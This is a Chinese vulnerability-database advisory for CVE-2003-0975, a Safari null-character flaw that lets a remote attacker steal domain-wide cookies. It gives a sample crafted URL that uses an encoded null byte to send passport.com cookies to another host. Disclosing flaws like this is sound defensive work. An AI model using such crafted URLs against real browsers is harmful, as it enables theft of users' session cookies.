Apple Safari Web Browser Null字符Cookie窃取漏洞

漏洞信息详情

Apple Safari Web Browser Null字符Cookie窃取漏洞

• CNNVD编号：CNNVD-200312-021
• 危害等级： 中危
  
  
• CVE编号：
  CVE-2003-0975
  
• 漏洞类型：
  
  
  输入验证
  
• 发布时间：
  
  2003-11-18
  
• 威胁类型：
  
  
  远程
  
• 更新时间：
  
  2006-06-15
  
• 厂        商：
  
  apple
• 漏洞来源：
  Austin Gilbert※ au…

Apple Safari是一款基于apple系统的WEB浏览器。
Apple Safari在处理恶意URL时存在问题，远程攻击者可以利用这个漏洞构建恶意URL，诱使用户访问，窃取敏感COOKIE信息。
如果Apple Safari浏览器装载如下URL进行解析：
http：//alive.znep.com\\%00www.passport.com/cgi-bin/cookies
会导致Apple Safari浏览器连接\”\\%00\”之前的主机，但是把COOKIE发送给基于整个主机名的服务器。这个问题可用于窃取特定路径的COOKIE信息，通过在请求URL中的特定路径和SSL，也可以窃取那些使用了secure标记的COOKIE信息。不过对特定主机名的COOKIE设置(如\”www.passport.com\”)不能使用这种方式窃取，只有设置为整个域的COOKIE才存在此问题。

厂商补丁：
Apple
—–
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.apple.com” target=”_blank”>
http://www.apple.com

来源: XF
名称: mozilla-netscape-steal-cookies(7973)
链接:http://xforce.iss.net/xforce/xfdb/7973

来源: BUGTRAQ
名称: 20031118 Apple Safari 1.1 (v100)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106917674428552&w=2

来源: lists.apple.com
链接:http://lists.apple.com/mhonarc/security-announce/msg00042.html

来源: docs.info.apple.com
链接:http://docs.info.apple.com/article.html?artnum=61798